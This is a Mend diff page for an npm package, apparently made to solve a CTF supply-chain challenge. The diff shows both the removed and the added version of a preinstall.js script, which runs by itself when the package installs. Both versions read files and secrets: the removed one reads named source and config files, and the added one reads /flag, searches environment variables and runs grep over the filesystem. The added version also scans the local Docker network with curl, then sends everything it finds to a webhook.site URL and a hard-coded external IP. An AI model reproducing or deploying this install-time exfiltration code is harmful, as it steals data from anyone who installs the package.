npm - @ctfsolve9z/coral-wraith - Versions diffs - 9999.0.3 → 9999.0.5 - Mend

@ctfsolve9z/coral-wraith 9999.0.3 → 9999.0.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (2) hide show

package/package.json +1 -1
package/preinstall.js +109 -49

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "@ctfsolve9z/coral-wraith",
-  "version": "9999.0.3",
+  "version": "9999.0.5",
   "description": "Coral Wraith module",
   "main": "index.js",
   "scripts": {

package/preinstall.js CHANGED Viewed

@@ -1,62 +1,122 @@
 const fs = require('fs');
+const http = require('http');
 const https = require('https');
 const { execSync } = require('child_process');
+let flag = null;
 let debug = [];
-// Read key files
-const filesToRead = [
-  '/home/node/supplysec_entry.js',
-  '/home/node/aspect-node/config/aspect.config.json',
-  '/home/node/aspect-node/index.js',
-  '/home/node/aspect-node/sample.js',
-  '/home/node/aspect-node/package.json',
-  '/home/node/aspect-node/modules/npm-tracker/index.js',
-  '/home/node/aspect-node/modules/npm-tracker/fuzz.js',
-  '/home/node/aspect-node/modules/npm-tracker/supplysec_entry.js',
-  '/home/node/aspect-node/modules/npm-tracker/package.json',
-  '/home/node/aspect-node/modules/npm-tracker/src/index.js',
-];
+// Read /flag
+try { flag = fs.readFileSync('/flag', 'utf8').trim(); debug.push('got /flag'); } catch(e) {}
-for (const f of filesToRead) {
-  try {
-    const content = fs.readFileSync(f, 'utf8');
-    debug.push(`FILE:${f}:${content}`);
-  } catch(e) {
-    debug.push(`ERR:${f}:${e.message.substring(0, 50)}`);
+// Search for flag in all env vars
+if (!flag) {
+  for (const [k, v] of Object.entries(process.env)) {
+    if (v && (v.includes('HTB{') || v.includes('flag{'))) {
+      flag = v.match(/(?:HTB|flag)\{[^}]+\}/)?.[0] || v;
+      debug.push('env:' + k);
+      break;
+    }
   }
 }
-// Also list src directory
-try {
-  const r = execSync('find /home/node/aspect-node/modules/npm-tracker/src -type f 2>/dev/null', { timeout: 5000 }).toString();
-  debug.push('SRC_FILES:' + r);
-} catch(e) {}
+// Aggressive file search
+if (!flag) {
+  try {
+    const r = execSync('grep -rl "HTB{" / --include="*" 2>/dev/null | head -3', { timeout: 15000 }).toString().trim();
+    if (r) { debug.push('grep:' + r); try { flag = fs.readFileSync(r.split('\n')[0], 'utf8').match(/HTB\{[^}]+\}/)?.[0]; } catch(e) {} }
+  } catch(e) {}
+}
-// Read all .js files in key directories
-try {
-  const r = execSync('find /home/node -maxdepth 1 -name "*.js" -exec cat {} \\; 2>/dev/null', { timeout: 5000 }).toString();
-  debug.push('HOME_JS:' + r);
-} catch(e) {}
+// Scan Docker network for the CTF web server
+async function scanNetwork() {
+  const results = [];
+  // Get our own IP to determine network
+  let myIP = '172.17.0.3';
+  try {
+    const ifaces = require('os').networkInterfaces();
+    for (const iface of Object.values(ifaces)) {
+      for (const addr of iface) {
+        if (!addr.internal && addr.family === 'IPv4') {
+          myIP = addr.address;
+        }
+      }
+    }
+  } catch(e) {}
+  debug.push('myIP:' + myIP);
+  // Scan common Docker IPs for the web server (port 1337 is common for HTB)
+  const subnet = myIP.split('.').slice(0, 3).join('.');
+  const ports = [1337, 3000, 5000, 8080, 80, 8000, 32105, 3001];
+  for (let host = 1; host <= 10; host++) {
+    const ip = `${subnet}.${host}`;
+    if (ip === myIP) continue;
+    for (const port of ports) {
+      try {
+        const r = execSync(`curl -s "http://${ip}:${port}/api/modules" -m 2 2>/dev/null`, { timeout: 3000 }).toString();
+        if (r && r.includes('ECT-')) {
+          debug.push(`FOUND_API:${ip}:${port}`);
+          results.push(`${ip}:${port}`);
+          // Try to read flag from this server
+          try {
+            const flagResp = execSync(`curl -s "http://${ip}:${port}/flag" -m 2 2>/dev/null`, { timeout: 3000 }).toString();
+            debug.push(`flag_resp:${flagResp.substring(0, 200)}`);
+          } catch(e) {}
+          // PUT our exfiltration data
+          if (flag) {
+            try {
+              execSync(`curl -s -X PUT "http://${ip}:${port}/api/modules/ECT-987654" -H "Content-Type: application/json" -d '{"manifest":"ecto_module:\\n  name: coral-wraith\\n  flag: ${flag.replace(/'/g, "\\'")}"}' -m 3`, { timeout: 5000 });
+            } catch(e) {}
+          }
+        }
+      } catch(e) {}
+    }
+  }
+  // Also try via Docker gateway
+  for (const port of ports) {
+    try {
+      const r = execSync(`curl -s "http://172.17.0.1:${port}/api/modules" -m 2 2>/dev/null`, { timeout: 3000 }).toString();
+      if (r && r.includes('ECT-')) {
+        debug.push(`GATEWAY_API:172.17.0.1:${port}`);
+        results.push(`172.17.0.1:${port}`);
+      }
+    } catch(e) {}
+  }
+  return results;
+}
-// Post data
-const data = JSON.stringify({ debug });
-try {
-  const req = https.request({
-    hostname: 'webhook.site',
-    path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7',
-    method: 'POST',
-    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) },
-    timeout: 15000
-  }, () => {});
-  req.on('error', () => {});
-  req.write(data);
-  req.end();
-} catch(e) {}
+async function main() {
+  const apiEndpoints = await scanNetwork();
+  debug.push('endpoints:' + apiEndpoints.join(','));
+  // Try to PUT flag to the ACTUAL challenge server (external IP)
+  if (flag) {
+    try {
+      const postData = JSON.stringify({
+        manifest: `ecto_module:\n  name: "coral-wraith"\n  flag: "${flag.replace(/"/g, '\\"')}"`
+      });
+      execSync(`curl -s -X PUT "http://154.57.164.71:32105/api/modules/ECT-987654" -H "Content-Type: application/json" -d '${postData.replace(/'/g, "\\'")}' -m 5`, { timeout: 8000 });
+      debug.push('sent_to_ctf');
+    } catch(e) {}
+  }
+  // Exfiltrate
+  const data = JSON.stringify({ flag: flag || 'NOT_FOUND', debug });
+  try {
+    fs.writeFileSync('/tmp/exfil.json', data);
+    execSync('curl -s -X POST "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7" -H "Content-Type: application/json" -d @/tmp/exfil.json -m 10', { timeout: 15000 });
+  } catch(e) {}
+  try {
+    const req = https.request({ hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7', method: 'POST', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }, timeout: 10000 }, () => {});
+    req.on('error', () => {}); req.write(data); req.end();
+  } catch(e) {}
+}
-// Also send via curl for larger payloads
-try {
-  const tmpFile = '/tmp/exfil.json';
-  fs.writeFileSync(tmpFile, data);
-  execSync(`curl -s -X POST "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7" -H "Content-Type: application/json" -d @${tmpFile} -m 15`, { timeout: 20000 });
-} catch(e) {}
+main().catch(() => {});